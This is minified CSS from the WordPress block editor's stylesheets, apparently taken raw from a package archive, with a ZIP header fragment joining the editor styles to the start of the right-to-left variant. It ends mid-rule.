(hover:none){.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{scrollbar-color:#949494 #0000}}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{overflow:auto;padding:4px;scrollbar-gutter:auto}.editor-list-view-sidebar__list-view-container{display:flex;flex-direction:column;height:100%}.editor-list-view-sidebar__tab-panel{height:100%}.editor-list-view-sidebar__outline{border-bottom:1px solid #ddd;display:flex;flex-direction:column;gap:8px;padding:16px}.editor-list-view-sidebar__outline>div>span:first-child{display:inline-block;width:90px}.editor-list-view-sidebar__outline>div>span{color:#757575;font-size:12px;line-height:1.4}.editor-post-order__panel,.editor-post-parent__panel{padding-top:8px}.editor-post-order__panel .editor-post-panel__row-control>div,.editor-post-parent__panel .editor-post-panel__row-control>div{width:100%}.editor-post-order__panel-dialog .editor-post-order,.editor-post-order__panel-dialog .editor-post-parent,.editor-post-parent__panel-dialog .editor-post-order,.editor-post-parent__panel-dialog .editor-post-parent{margin:8px}.editor-post-order__panel-dialog .components-popover__content,.editor-post-parent__panel-dialog .components-popover__content{min-width:320px}.editor-post-author__panel{padding-top:8px}.editor-post-author__panel .editor-post-panel__row-control>div{width:100%}.editor-post-author__panel-dialog .editor-post-author{margin:8px;min-width:248px}.editor-action-modal{z-index:1000001}.editor-post-card-panel__content{flex-grow:1}.editor-post-card-panel__title{width:100%}.editor-post-card-panel__title.editor-post-card-panel__title{align-items:center;column-gap:8px;display:flex;flex-wrap:wrap;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:500;line-height:20px;margin:0;row-gap:4px;word-break:break-word}.editor-post-card-panel__icon{flex:0 0 24px;height:24px;width:24px}.editor-post-card-panel__header{display:flex;justify-content:space-between}.editor-post-card-panel.has-description .editor-post-card-panel__header{margin-bottom:8px}.editor-post-card-panel .editor-post-card-panel__title-name{padding:2px 0}.editor-post-card-panel .editor-post-card-panel__description,.editor-post-content-information{color:#757575}.editor-post-content-information .components-text{color:inherit}.editor-post-discussion__panel-dialog .editor-post-discussion{margin:8px;min-width:248px}.editor-post-discussion__panel-toggle .components-text{color:inherit}.editor-post-discussion__panel-dialog .components-popover__content{min-width:320px}.editor-post-excerpt__textarea{margin-bottom:10px;width:100%}.editor-post-excerpt__dropdown__content .components-popover__content{min-width:320px;padding:16px}.editor-post-featured-image{padding:0}.editor-post-featured-image .hidden{display:none}.editor-post-featured-image .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.editor-post-featured-image__container{position:relative}.editor-post-featured-image__container:focus .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:focus-within .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:hover .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image){opacity:1}.editor-post-featured-image__container .editor-post-featured-image__actions.editor-post-featured-image__actions-missing-image{margin-top:16px;opacity:1}.editor-post-featured-image__container .components-drop-zone__content{border-radius:2px}.editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner{align-items:center;display:flex;gap:8px}.editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{margin:0}.editor-post-featured-image__preview,.editor-post-featured-image__toggle{box-shadow:0 0 0 0 var(--wp-admin-theme-color);display:flex;justify-content:center;min-height:40px;outline-offset:-1px;overflow:hidden;padding:0;width:100%}.editor-post-featured-image__preview{height:auto!important;outline:1px solid #0000001a}.editor-post-featured-image__preview .editor-post-featured-image__preview-image{aspect-ratio:2/1;object-fit:cover;object-position:50% 50%;width:100%}.editor-post-featured-image__toggle{box-shadow:inset 0 0 0 1px #ccc}.editor-post-featured-image__toggle:focus:not(:disabled){box-shadow:0 0 0 currentColor inset,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){bottom:0;opacity:0;padding:8px;position:absolute}@media not (prefers-reduced-motion){.editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){transition:opacity 50ms ease-out}}.editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image) .editor-post-featured-image__action{backdrop-filter:blur(16px) saturate(180%);background:#ffffffbf}.editor-post-featured-image__actions .editor-post-featured-image__action{flex-grow:1;justify-content:center}[class].editor-post-format__suggestion{margin:4px 0 0}.editor-post-format__dialog .editor-post-format__dialog-content{margin:8px;min-width:248px}.editor-post-last-edited-panel{color:#757575}.editor-post-last-edited-panel .components-text{color:inherit}.editor-post-last-revision__title{font-weight:500;width:100%}.editor-post-last-revision__title.components-button.has-icon{height:100%;justify-content:space-between}.editor-post-last-revision__title.components-button.has-icon:active,.editor-post-last-revision__title.components-button.has-icon:hover{background:#f0f0f0}.editor-post-last-revision__title.components-button.has-icon:focus{border-radius:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.components-panel__body.is-opened.editor-post-last-revision__panel{height:48px;padding:0}.components-panel__body.is-opened.editor-post-last-revision__panel .editor-post-last-revision__title.components-button.components-button{padding:16px}.editor-private-post-last-revision__button{display:inline-block}.editor-post-locked-modal__buttons{margin-top:24px}.editor-post-locked-modal__avatar{border-radius:50%;margin-top:16px;min-width:auto!important}.editor-post-panel__row{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.editor-post-panel__row-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;padding:6px 0;width:38%}.editor-post-panel__row-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.editor-post-panel__row-control .components-button{height:auto;max-width:100%;min-height:32px;text-align:left;text-wrap:balance;text-wrap:pretty;white-space:normal}.editor-post-panel__row-control .components-dropdown{max-width:100%}.editor-post-panel__section{padding:16px}.editor-post-publish-panel__content{min-height:calc(100% - 148px)}.editor-post-publish-panel__content>.components-spinner{display:block;margin:100px auto 0}.editor-post-publish-panel__header{align-content:space-between;align-items:center;background:#fff;border-bottom:1px solid #ddd;display:flex;height:65px;padding-left:16px;padding-right:16px}.editor-post-publish-panel__header .components-button{justify-content:center;width:100%}.editor-post-publish-panel__header .has-icon{margin-left:auto;width:auto}.components-site-card{align-items:center;display:flex;margin:16px 0}.components-site-icon{border:none;border-radius:2px;flex-shrink:0;height:36px;margin-right:12px;width:36px}.components-site-name{display:block;font-size:14px}.components-site-home{color:#757575;display:block;font-size:12px;word-break:break-word}.editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{flex:1}@media (min-width:480px){.editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{max-width:160px}}.editor-post-publish-panel__header-publish-button{justify-content:center;padding-left:4px}.editor-post-publish-panel__header-cancel-button{padding-right:4px}.editor-post-publish-panel__header-published{flex-grow:1}.editor-post-publish-panel__footer{padding:16px}.components-button.editor-post-publish-panel__toggle.is-primary{align-items:center;display:inline-flex}.components-button.editor-post-publish-panel__toggle.is-primary.is-busy .dashicon{display:none}.components-button.editor-post-publish-panel__toggle.is-primary .dashicon{margin-right:-4px}.editor-post-publish-panel__link{font-weight:400;padding-left:4px}.editor-post-publish-panel__prepublish{padding:16px}.editor-post-publish-panel__prepublish strong{color:#1e1e1e}.editor-post-publish-panel__prepublish .components-panel__body{background:#fff;margin-left:-16px;margin-right:-16px}.editor-post-publish-panel__prepublish .editor-post-visibility__dialog-legend{display:none}.editor-post-publish-panel__prepublish .components-panel__body-title .components-button{align-items:flex-start;text-wrap:balance;text-wrap:pretty}.post-publish-panel__postpublish .components-panel__body{border-bottom:1px solid #e0e0e0;border-top:none;word-break:break-word}.post-publish-panel__postpublish-buttons{align-content:space-between;display:flex;flex-wrap:wrap;gap:16px}.post-publish-panel__postpublish-buttons .components-button,.post-publish-panel__postpublish-buttons .components-button.has-icon{flex:1;justify-content:center;min-width:unset}.post-publish-panel__postpublish-buttons .components-clipboard-button{width:100%}.post-publish-panel__postpublish-post-address-container{align-items:flex-end;display:flex;margin-bottom:16px}.post-publish-panel__postpublish-post-address-container .post-publish-panel__postpublish-post-address{flex:1}.post-publish-panel__postpublish-post-address-container input[readonly]{background:#f0f0f0;border-color:#ccc;height:36px;overflow:hidden;padding:12px;text-overflow:ellipsis}.post-publish-panel__postpublish-post-address__copy-button-wrap{flex-shrink:0;margin-left:16px}.post-publish-panel__postpublish-header{font-weight:500}.post-publish-panel__postpublish-subheader{margin:0 0 8px}.post-publish-panel__tip{color:#f0b849}@media screen and (max-width:782px){.post-publish-panel__postpublish-post-address__button-wrap .components-button{height:40px}}.editor-post-publish-panel{box-sizing:border-box}.editor-post-publish-panel *,.editor-post-publish-panel :after,.editor-post-publish-panel :before{box-sizing:inherit}.editor-post-publish-panel{background:#fff;bottom:0;left:0;overflow:auto;position:fixed;right:0;top:46px;z-index:100001}@media (min-width:782px){.editor-post-publish-panel{border-left:1px solid #ddd;left:auto;top:32px;width:281px;z-index:99998}}@media (min-width:782px) and (not (prefers-reduced-motion)){.editor-post-publish-panel{animation:editor-post-publish-panel__slide-in-animation .1s forwards;transform:translateX(100%)}}@media (min-width:782px){body.is-fullscreen-mode .editor-post-publish-panel{top:0}[role=region]:focus .editor-post-publish-panel{transform:translateX(0)}}@keyframes editor-post-publish-panel__slide-in-animation{to{transform:translateX(0)}}.editor-post-saved-state{align-items:center;color:#757575;display:flex;overflow:hidden;padding:12px 4px;white-space:nowrap;width:28px}.editor-post-saved-state.is-saved[aria-disabled=true],.editor-post-saved-state.is-saved[aria-disabled=true]:hover,.editor-post-saved-state.is-saving[aria-disabled=true],.editor-post-saved-state.is-saving[aria-disabled=true]:hover{background:#0000;color:#757575}.editor-post-saved-state svg{display:inline-block;flex:0 0 auto;fill:currentColor;margin-right:8px}@media (min-width:600px){.editor-post-saved-state{padding:8px 12px;text-indent:inherit;width:auto}.editor-post-saved-state svg{margin-right:0}}.editor-post-save-draft.has-text.has-icon svg{margin-right:0}.editor-post-schedule__panel-dropdown{width:100%}.editor-post-schedule__dialog .components-popover__content{min-width:320px;padding:16px}.editor-post-status{max-width:100%}.editor-post-status.is-read-only{padding:6px 12px}.editor-post-status .editor-post-status__toggle.editor-post-status__toggle{padding-bottom:4px;padding-top:4px}.editor-change-status__password-fieldset,.editor-change-status__publish-date-wrapper{border-top:1px solid #e0e0e0;padding-top:16px}.editor-change-status__content .components-popover__content{min-width:320px;padding:16px}.editor-change-status__content .editor-change-status__password-legend{margin-bottom:8px;padding:0}.editor-change-status__content p.components-base-control__help:has(.components-checkbox-control__help){margin-top:4px}.editor-post-sticky__checkbox-control{border-top:1px solid #e0e0e0;padding-top:16px}.editor-post-sync-status__value{padding:6px 0 6px 12px}.editor-post-taxonomies__hierarchical-terms-list{margin-left:-6px;margin-top:-6px;max-height:14em;overflow:auto;padding-left:6px;padding-top:6px}.editor-post-taxonomies__hierarchical-terms-choice{margin-bottom:8px}.editor-post-taxonomies__hierarchical-terms-choice:last-child{margin-bottom:4px}.editor-post-taxonomies__hierarchical-terms-subchoices{margin-left:16px;margin-top:8px}.editor-post-taxonomies__flat-term-most-used .editor-post-taxonomies__flat-term-most-used-label{margin-bottom:4px}.editor-post-taxonomies__flat-term-most-used-list{margin:0}.editor-post-taxonomies__flat-term-most-used-list li{display:inline-block;margin-right:8px}.editor-post-template__swap-template-modal{z-index:1000001}.editor-post-template__swap-template-modal .editor-post-template__swap-template-search{background:#fff;margin-bottom:-4px;padding:16px 0;position:sticky;top:0;transform:translateY(-4px);z-index:2}.editor-post-template__create-template-modal{z-index:1000001}.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{column-count:2;column-gap:24px;padding-top:2px}@media (min-width:782px){.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{column-count:4}}.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.editor-post-template__dropdown .components-popover__content{min-width:240px}.editor-post-template__dropdown .components-button.is-pressed,.editor-post-template__dropdown .components-button.is-pressed:hover{background:inherit;color:inherit}@media (min-width:782px){.editor-post-template__create-form{width:320px}}.editor-post-template__classic-theme-dropdown{padding:8px}textarea.editor-post-text-editor{border:1px solid #949494;border-radius:0;box-shadow:none;display:block;font-family:Menlo,Consolas,monaco,monospace;line-height:2.4;margin:0;min-height:200px;overflow:hidden;resize:none;width:100%}@media not (prefers-reduced-motion){textarea.editor-post-text-editor{transition:border .1s ease-out,box-shadow .1s linear}}textarea.editor-post-text-editor{padding:16px}@media (min-width:600px){textarea.editor-post-text-editor{padding:24px}}textarea.editor-post-text-editor{font-size:16px!important}@media (min-width:600px){textarea.editor-post-text-editor{font-size:15px!important}}textarea.editor-post-text-editor:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);position:relative}textarea.editor-post-text-editor::-webkit-input-placeholder{color:#1e1e1e9e}textarea.editor-post-text-editor::-moz-placeholder{color:#1e1e1e9e}textarea.editor-post-text-editor:-ms-input-placeholder{color:#1e1e1e9e}.editor-post-title.is-raw-text{margin-bottom:24px;margin-top:2px;max-width:none}.editor-post-url__panel-dropdown{width:100%}.editor-post-url__panel-dialog .editor-post-url{margin:8px;min-width:248px}.editor-post-url__front-page-link,.editor-post-url__link{direction:ltr;word-break:break-word}.editor-post-url__front-page-link{border-radius:2px;color:var(--wp-admin-theme-color);padding:6px 12px}.editor-post-url__front-page-link:hover{background:color-mix(in srgb,var(--wp-admin-theme-color) 4%,#0000);color:var(--wp-admin-theme-color-darker-20,#183ad6)}.editor-post-url__front-page-link:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);outline:3px solid #0000}.editor-post-url__link-slug{font-weight:600}.editor-post-url__input input.components-input-control__input{padding-inline-start:0!important}.editor-post-parent__panel-toggle,.editor-post-url__panel-toggle{word-break:break-word}.editor-post-url__intro{margin:0}.editor-post-url__permalink{margin-bottom:0;margin-top:8px}.editor-post-url__permalink-visual-label{display:block}.editor-posts-per-page-dropdown__content .components-popover__content{min-width:320px;padding:16px}.editor-post-trash.components-button{flex-grow:1;justify-content:center}.editor-preview-dropdown .editor-preview-dropdown__toggle.has-icon.has-text{padding-left:6px;padding-right:4px}.editor-preview-dropdown__button-external{display:flex;justify-content:space-between;width:100%}.editor-resizable-editor.is-resizable{margin:0 auto;overflow:visible}.editor-resizable-editor__resize-handle{appearance:none;background:none;border:0;border-radius:9999px;bottom:0;cursor:ew-resize;height:100px;margin:auto 0;outline:none;padding:0;position:absolute;top:0;width:12px}.editor-resizable-editor__resize-handle:after{background-color:#75757566;border-radius:9999px;bottom:16px;content:"";left:4px;position:absolute;right:0;top:16px;width:4px}.editor-resizable-editor__resize-handle.is-left{left:-18px}.editor-resizable-editor__resize-handle.is-right{right:-18px}.editor-resizable-editor__resize-handle:active,.editor-resizable-editor__resize-handle:focus,.editor-resizable-editor__resize-handle:hover{opacity:1}.editor-resizable-editor__resize-handle:active:after,.editor-resizable-editor__resize-handle:focus:after,.editor-resizable-editor__resize-handle:hover:after{background-color:var(--wp-admin-theme-color)}.editor-layout__toggle-entities-saved-states-panel,.editor-layout__toggle-publish-panel,.editor-layout__toggle-sidebar-panel{background-color:#fff;border:1px dotted #ddd;bottom:auto;box-sizing:border-box;display:flex;height:auto!important;justify-content:center;left:auto;padding:24px;position:fixed!important;right:0;top:-9999em;width:280px;z-index:100000}.interface-interface-skeleton__actions:focus .editor-layout__toggle-entities-saved-states-panel,.interface-interface-skeleton__actions:focus .editor-layout__toggle-publish-panel,.interface-interface-skeleton__actions:focus-within .editor-layout__toggle-entities-saved-states-panel,.interface-interface-skeleton__actions:focus-within .editor-layout__toggle-publish-panel{bottom:0;top:auto}.editor-start-page-options__modal .editor-start-page-options__modal__actions{background-color:#fff;border-top:1px solid #ddd;bottom:0;height:72px;margin-left:-32px;margin-right:-32px;padding-left:32px;padding-right:32px;position:absolute;width:100%;z-index:1}.editor-start-page-options__modal .block-editor-block-patterns-list{padding-bottom:72px}.editor-start-page-options__modal-content .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:782px){.editor-start-page-options__modal-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.editor-start-page-options__modal-content .block-editor-block-patterns-list{column-count:4}}.editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column;margin-bottom:24px}.editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{min-height:100px}.editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__content{width:100%}.editor-start-template-options__modal .editor-start-template-options__modal__actions{background-color:#fff;border-top:1px solid #ddd;bottom:0;height:92px;margin-left:-32px;margin-right:-32px;padding-left:32px;padding-right:32px;position:absolute;width:100%;z-index:1}.editor-start-template-options__modal .block-editor-block-patterns-list{padding-bottom:92px}.editor-start-template-options__modal-content .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:782px){.editor-start-template-options__modal-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.editor-start-template-options__modal-content .block-editor-block-patterns-list{column-count:4}}.editor-start-template-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.editor-start-template-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-patterns-list__item-title{display:none}.components-panel__header.editor-sidebar__panel-tabs{padding-left:0;padding-right:8px}.components-panel__header.editor-sidebar__panel-tabs .components-button.has-icon{padding:0}@media (min-width:782px){.components-panel__header.editor-sidebar__panel-tabs .components-button.has-icon{display:flex}}.editor-post-summary .components-v-stack:empty{display:none}.editor-sidebar{box-sizing:border-box}.editor-sidebar *,.editor-sidebar :after,.editor-sidebar :before{box-sizing:inherit}.editor-site-discussion-dropdown__content .components-popover__content{min-width:320px;padding:16px}.table-of-contents__popover.components-popover .components-popover__content{min-width:380px}.components-popover.table-of-contents__popover{z-index:99998}.table-of-contents__popover .components-popover__content{padding:16px}@media (min-width:600px){.table-of-contents__popover .components-popover__content{max-height:calc(100vh - 120px);overflow-y:auto}}.table-of-contents__popover hr{margin:10px -16px 0}.table-of-contents__wrapper:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.table-of-contents__counts{display:flex;flex-wrap:wrap;margin:-8px 0 0}.table-of-contents__count{color:#1e1e1e;display:flex;flex-basis:33%;flex-direction:column;font-size:13px;margin-bottom:0;margin-top:8px;padding-right:8px}.table-of-contents__count:nth-child(4n){padding-right:0}.table-of-contents__number,.table-of-contents__popover .word-count{color:#1e1e1e;font-size:21px;font-weight:400;line-height:30px}.table-of-contents__title{display:block;font-size:15px;font-weight:600;margin-top:20px}.editor-text-editor{box-sizing:border-box}.editor-text-editor *,.editor-text-editor :after,.editor-text-editor :before{box-sizing:inherit}.editor-text-editor{background-color:#fff;flex-grow:1;position:relative;width:100%}.editor-text-editor .editor-post-title.is-raw-text textarea,.editor-text-editor .editor-post-title:not(.is-raw-text){border:1px solid #949494;border-radius:0;font-family:Menlo,Consolas,monaco,monospace;font-size:2.5em;font-weight:400;line-height:1.4;max-width:none;padding:16px}@media (min-width:600px){.editor-text-editor .editor-post-title.is-raw-text textarea,.editor-text-editor .editor-post-title:not(.is-raw-text){padding:24px}}.editor-text-editor .editor-post-title.is-raw-text textarea:focus,.editor-text-editor .editor-post-title:not(.is-raw-text):focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.editor-text-editor__body{margin-left:auto;margin-right:auto;max-width:1080px;padding:0 12px 12px;width:100%}@media (min-width:960px){.editor-text-editor__body{padding:0 24px 24px}}.editor-text-editor__toolbar{background:#fffc;display:flex;left:0;padding:4px 12px;position:sticky;right:0;top:0;z-index:1}@media (min-width:600px){.editor-text-editor__toolbar{padding:12px}}@media (min-width:960px){.editor-text-editor__toolbar{padding:12px 24px}}.editor-text-editor__toolbar h2{color:#1e1e1e;font-size:13px;line-height:40px;margin:0 auto 0 0}.editor-visual-editor{background-color:var(--wp-editor-canvas-background);display:flex;position:relative}.editor-visual-editor iframe[name=editor-canvas]{background-color:initial}.editor-visual-editor{align-items:center}.editor-visual-editor.is-resizable{max-height:100%}.editor-visual-editor.has-padding{padding:24px 24px 0}.editor-visual-editor.is-iframed{overflow:hidden}.editor-visual-editor .components-button{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;padding:6px 12px}.editor-visual-editor .components-button.has-icon,.editor-visual-editor .components-button.is-tertiary{padding:6px}.editor-fields-content-preview{border-radius:4px;display:flex;flex-direction:column;height:100%}.dataviews-view-table .editor-fields-content-preview{flex-grow:0;width:96px}.editor-fields-content-preview .block-editor-block-preview__container,.editor-fields-content-preview .editor-fields-content-preview__empty{margin-bottom:auto;margin-top:auto}.editor-fields-content-preview__empty{text-align:center}PK!iԍdist/editor/style-rtl.cssnuȯ@charset "UTF-8"; :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .interface-complementary-area-header{ background:#fff; gap:4px; padding-left:8px; } .interface-complementary-area-header .interface-complementary-area-header__title{ margin:0 0 0 auto; } .interface-complementary-area{ background:#fff; color:#1e1e1e; height:100%; overflow:auto; } @media (min-width:600px){ .interface-complementary-area{ -webkit-overflow-scrolling:touch; } } @media (min-width:782px){ .interface-complementary-area{ width:280px; } } .interface-complementary-area .components-panel{ border:none; position:relative; z-index:0; } .interface-complementary-area .components-panel__header{ position:sticky; top:0; z-index:1; } .interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{ top:0; } .interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){ margin-top:0; } .interface-complementary-area h2{ color:#1e1e1e; font-size:13px; font-weight:500; margin-bottom:1.5em; } .interface-complementary-area h3{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .interface-complementary-area hr{ border-bottom:1px solid #f0f0f0; border-top:none; margin:1.5em 0; } .interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{ box-shadow:none; margin-bottom:1.5em; } .interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{ margin-bottom:0; } .interface-complementary-area .block-editor-skip-to-selected-block:focus{ bottom:10px; left:10px; right:auto; top:auto; } .interface-complementary-area__fill{ height:100%; } @media (min-width:782px){ body.js.is-fullscreen-mode{ height:calc(100% + 32px); margin-top:-32px; } body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{ display:none; } body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{ margin-right:0; } } html.interface-interface-skeleton__html-container{ position:fixed; width:100%; } @media (min-width:782px){ html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){ position:static; width:auto; } } .interface-interface-skeleton{ bottom:0; display:flex; flex-direction:row; height:auto; left:0; max-height:100%; position:fixed; top:46px; } @media (min-width:783px){ .interface-interface-skeleton{ top:32px; } .is-fullscreen-mode .interface-interface-skeleton{ top:0; } } .interface-interface-skeleton__editor{ display:flex; flex:0 1 100%; flex-direction:column; overflow:hidden; } .interface-interface-skeleton{ right:0; } @media (min-width:783px){ .interface-interface-skeleton{ right:160px; } } @media (min-width:783px){ .auto-fold .interface-interface-skeleton{ right:36px; } } @media (min-width:961px){ .auto-fold .interface-interface-skeleton{ right:160px; } } .folded .interface-interface-skeleton{ right:0; } @media (min-width:783px){ .folded .interface-interface-skeleton{ right:36px; } } body.is-fullscreen-mode .interface-interface-skeleton{ right:0 !important; } .interface-interface-skeleton__body{ display:flex; flex-grow:1; overflow:auto; overscroll-behavior-y:none; position:relative; } @media (min-width:782px){ .has-footer .interface-interface-skeleton__body{ padding-bottom:25px; } } .interface-interface-skeleton__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; z-index:20; } @media (min-width:782px){ .interface-interface-skeleton__content{ z-index:auto; } } .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ background:#fff; bottom:0; color:#1e1e1e; flex-shrink:0; position:absolute; right:0; top:0; width:auto; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ position:relative !important; } } .interface-interface-skeleton__sidebar{ border-top:1px solid #e0e0e0; overflow:hidden; } @media (min-width:782px){ .interface-interface-skeleton__sidebar{ box-shadow:1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__secondary-sidebar{ border-top:1px solid #e0e0e0; left:0; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar{ box-shadow:-1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__header{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); color:#1e1e1e; flex-shrink:0; height:auto; outline:1px solid #0000; z-index:30; } .interface-interface-skeleton__footer{ background-color:#fff; border-top:1px solid #e0e0e0; bottom:0; color:#1e1e1e; display:none; flex-shrink:0; height:auto; position:absolute; right:0; width:100%; z-index:90; } @media (min-width:782px){ .interface-interface-skeleton__footer{ display:flex; } } .interface-interface-skeleton__footer .block-editor-block-breadcrumb{ align-items:center; background:#fff; display:flex; font-size:13px; height:24px; padding:0 18px; z-index:30; } .interface-interface-skeleton__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:0; position:fixed !important; right:auto; top:-9999em; width:100vw; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__actions{ width:280px; } } .interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{ bottom:0; top:auto; } .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:46px; } @media (min-width:782px){ .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ border-right:1px solid #ddd; top:32px; } .is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:0; } } .interface-pinned-items{ display:flex; } .interface-pinned-items .components-button{ display:none; margin:0; } .interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{ display:flex; } .interface-pinned-items .components-button svg{ max-height:24px; max-width:24px; } @media (min-width:600px){ .interface-pinned-items .components-button{ display:flex; } } .interface-pinned-items{ gap:8px; } .editor-autocompleters__user .editor-autocompleters__no-avatar:before{ content:"\f110"; font:normal 20px/1 dashicons; margin-left:5px; vertical-align:middle; } .editor-autocompleters__user .editor-autocompleters__user-avatar{ flex-grow:0; flex-shrink:0; height:24px; margin-left:8px; max-width:none; width:24px; } .editor-autocompleters__user .editor-autocompleters__user-name{ flex-grow:1; flex-shrink:0; max-width:200px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .editor-autocompleters__user .editor-autocompleters__user-slug{ flex-grow:0; flex-shrink:0; margin-right:8px; max-width:100px; overflow:none; text-overflow:ellipsis; white-space:nowrap; } .editor-autocompleters__user:not(.is-primary) .editor-autocompleters__user-slug{ color:#757575; } .interface-interface-skeleton__sidebar:has(.editor-collab-sidebar){ box-shadow:none; } .interface-interface-skeleton__sidebar:has(.editor-collab-sidebar) 